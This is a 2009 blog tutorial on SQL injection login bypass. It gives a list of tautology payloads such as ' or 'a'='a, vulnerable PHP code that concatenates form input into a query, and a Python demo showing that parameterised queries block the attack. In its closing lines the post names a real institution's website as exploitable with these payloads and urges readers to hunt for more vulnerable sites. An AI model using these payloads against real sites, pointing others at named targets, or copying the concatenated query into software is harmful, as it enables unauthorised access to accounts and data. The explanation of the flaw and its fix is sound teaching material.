Wednesday, December 9, 2009

SQL Injection - Part 1

Structured Query Language

' or '1'='1 Injection


SQL injection is a technique for injecting SQL into a query through an input, typically a web form. The logic that validates a user is manipulated by supplying extra SQL in the input. Many web pages take parameters from the web user and build an SQL query to the database from them. For example, when a user logs in, the web page takes the user name and password and builds an SQL query to check whether a user with that name and password exists. Because the input is pasted straight into the query text, a crafted user name and/or password field can change the meaning of the query and thus grant entry into the website.

This is my first article on SQL Injection. So, here we will see how to inject an SQL query through the username and password fields to gain access to the website. Not all websites are vulnerable to SQL Injection; only those that build the query by concatenating unescaped user input are. Finding out whether a login form is vulnerable is simple.

Just enter ' or 'a'='a in username and password field and click login.

List of golden queries:
All of the following inputs can be used for SQL Injection. Each one closes the quoted string the application opened and appends a condition that is always true (a tautology), so the exact literal on either side of the `=` does not matter.
  • ' or 'a'='a
  • ' or '1'='1
  • ' or '0'='0
  • ' or '007'='007
  • ' or 'biti'='biti
  • ' or 'technozone'='technozone
  • ' or 1=1 --
Example:
The following PHP code validates the authenticity of the user. It is intentionally shown as written, with the user input concatenated directly into the SQL string, because that is what makes it vulnerable.

<?php
session_start();

// raw, unescaped form input is copied straight into the session
$_SESSION['username']=$_POST["username"];
$_SESSION['password']=$_POST["password"];

// query for a user/pass match: the input is spliced into the SQL text,
// so a quote character in the input becomes part of the query itself
$result=mysql_query("select * from users where username='" . $_SESSION['username'] . "' and password='" . $_SESSION['password'] . "'");

// retrieve number of rows resulted
$num=mysql_num_rows($result);

if($num < 1)
{
    //Login Failed
    header('Refresh: 2; URL=login.php?msg=login_failed');
}
else
{
    //Login Successful: any non-zero row count is accepted as a valid login
    header('Refresh: 2;URL=admin/admin_home.php?msg=login_success');
}
?>

So, if we put ' or 'a'='a in both the username and password fields, the query for a user/pass match will become


$result=mysql_query("select * from users where username='' or 'a'='a' and password='' or 'a'='a'");

The above statement will now return every row from the table users. In SQL, AND binds tighter than OR, so the WHERE clause is read as `username='' OR ('a'='a' AND password='') OR 'a'='a'`, and the final 'a'='a' is true for every row. Since the validation code only checks that at least one row came back, the golden query ' or 'a'='a is enough to enter the website.
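To make the mechanism concrete, here is a small added example (not code from the original post) that reproduces the PHP logic above in Python against an in-memory SQLite table with constructed sample users. `vulnerable_login` builds the query by string concatenation exactly as the PHP does; `safe_login` is the fix, a parameterised query in which the input is bound as data and can never change the statement. Running both with the golden query shows the vulnerable version returning every user while the parameterised version returns none. The table contents and user names are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample data for the demo; not from the original post.
USERS = [("alice", "s3cret"), ("bob", "hunter2"), ("admin", "letmein")]

GOLDEN_QUERY = "' or 'a'='a"  # the payload discussed in the post


def make_db():
    """Create an in-memory users table matching the shape the PHP queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)", USERS)
    return conn


def vulnerable_login(conn, username, password):
    """Mirrors the post's PHP: form input is spliced straight into the SQL text."""
    sql = ("select * from users where username='" + username
           + "' and password='" + password + "'")
    return conn.execute(sql).fetchall()


def safe_login(conn, username, password):
    """The fix: placeholders bind the input as values, so quotes in the input
    stay inside the value and cannot close the string or add conditions."""
    sql = "select * from users where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchall()


def login_count(login_fn, username, password):
    """Number of matching rows, i.e. the $num the PHP code tests against < 1."""
    conn = make_db()
    try:
        return len(login_fn(conn, username, password))
    finally:
        conn.close()


if __name__ == "__main__":
    for fn in (vulnerable_login, safe_login):
        print(fn.__name__, "valid creds:", login_count(fn, "alice", "s3cret"))
        print(fn.__name__, "golden query:", login_count(fn, GOLDEN_QUERY, GOLDEN_QUERY))
```

With the concatenated query the golden input matches all three sample users, so the `$num < 1` check passes and the login succeeds; with the parameterised query the same input is compared literally against the stored user name and matches nothing. Note that `safe_login` still compares plaintext passwords as the post's code does; storing and comparing password hashes is a separate fix from the injection itself.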

I have found a vulnerable site where you can use this golden query ' or 'a'='a . This vulnerable website belongs to an institution related to IIT JEE coaching. The site is www.fiitjee.com .

Friends, search for more vulnerable sites and inform them of the vulnerability.
